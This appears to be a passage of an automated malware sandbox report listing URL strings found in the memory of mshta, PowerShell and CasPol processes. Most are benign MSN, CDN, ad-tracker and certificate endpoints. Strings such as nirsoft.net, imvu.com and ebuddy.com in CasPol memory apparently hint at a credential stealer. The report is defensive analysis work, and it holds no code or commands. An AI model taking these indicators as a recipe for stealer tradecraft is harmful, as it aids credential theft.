                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCr7K?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAtCzBA?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAyXtPP?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/AAzl6aj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17cJeH?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dAYk?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dJEo?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dLTg?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dOHE?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dWNo?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17dtuY?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e0XT?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e3cA?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e5NB?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e7Ai?h=250&w=300&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17e9Q0?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=j
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17eeI9?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BB17ejTJ?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBPfCZL?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBYMDHp?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBZbaoj?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBh7lZF?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBih5H?m=6&o=true&u=true&n=true&w=30&h=30
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlKGpe?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBlPHfm?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBnMzWD?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://img-s-msn-com.akamaized.net/tenant/amp/entityid/BBqRcpR?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                  Source: powershell.exe, 00000007.00000002.472448949.00000000123C1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://o.aolcdn.com/ads/adswrappermsni.js
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
                  Source: mshta.exe, 00000004.00000003.446057103.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445431645.0000000002E42000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C300000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683
                  Source: powershell.exe, 00000007.00000002.467820686.0000000002391000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000C.00000002.523814321.00000000020C1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000012.00000002.499810498.0000000002381000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.557478401.0000000002141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/css/f15f847b-3b9d03a9/directi
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-7e75174a/directio
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/en-us/homepage/_sc/js/f15f847b-80c466c0/directio
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/2b/a5ea21.ico
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/6b/7fe9d7.woff
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/9b/e151e5.gif
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-eus/sc/c6/cfdbd9.png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/64bfc5b6/webcore/externalscripts/oneTrust/de-
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/975a7d20/webcore/externalscripts/jquery/jquer
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/_h/a1438951/webcore/externalscripts/oneTrust/ski
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/css/f60532dd-8d94f807/directi
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-2923b6c2/directio
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/de-de/homepage/_sc/js/f60532dd-a12f0134/directio
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/11/755f86.png
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/21/241a2c.woff
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/2b/a5ea21.ico
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/hp-neu/sc/ea/4996b9.woff
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA2oHEB.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42Hq5.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42eYr.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA42pjY.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6K5wX.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA6pevu.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8I0Dg.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AA8uJZv.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAHxwMU.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAJhH73.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAgi0nZ.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAhvyvD.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtB8UA.img?h=166&w=310
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBduP.img?h=75&w=100&
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtBnuN.img?h=166&w=310
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCLD9.img?h=368&w=522
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCr7K.img?h=75&w=100&
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAtCzBA.img?h=250&w=300
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAyXtPP.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAzl6aj.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17cJeH.img?h=250&w=30
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dAYk.img?h=75&w=100
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dJEo.img?h=75&w=100
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dLTg.img?h=166&w=31
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dOHE.img?h=333&w=31
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dWNo.img?h=166&w=31
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17dtuY.img?h=333&w=31
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e0XT.img?h=166&w=31
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e3cA.img?h=75&w=100
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e5NB.img?h=75&w=100
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e7Ai.img?h=250&w=30
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17e9Q0.img?h=166&w=31
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17eeI9.img?h=75&w=100
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB17ejTJ.img?h=75&w=100
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBPfCZL.img?h=27&w=27&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBYMDHp.img?h=27&w=27&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBZbaoj.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBh7lZF.img?h=333&w=311
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBih5H.img?m=6&o=true&u
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlKGpe.img?h=75&w=100&
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBlPHfm.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBnMzWD.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BBqRcpR.img?h=16&w=16&m
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://static.chartbeat.com/js/chartbeat.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
                  Source: mshta.exe, 00000004.00000003.445431645.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.440193200.0000000002E1B000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.446100049.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000002.446611329.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000004.00000003.445814021.0000000002E1C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.474546983.000000001C364000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000002.493049973.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.487997220.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484988627.00000000039D8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.490146126.00000000039DB000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 0000000E.00000003.484081935.00000000039DB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.ebuddy.com
                  Source: CasPol.exe, CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.com
                  Source: CasPol.exe, 0000001F.00000002.539618581.000000000038C000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.imvu.com/Ex
                  Source: CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com
                  Source: CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.imvu.comr
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://www.msn.com/
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://www.msn.com/?ocid=iehp
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://www.msn.com/advertisement.ad.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
                  Source: CasPol.exe, 0000001D.00000002.547843346.0000000000224000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net
                  Source: CasPol.exe, 0000001F.00000002.539680806.0000000000400000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.nirsoft.net/
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://contextual.media.net/
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://contextual.media.net/8/nrrV73987.js
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
                  Source: bhv5265.tmp.29.drString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
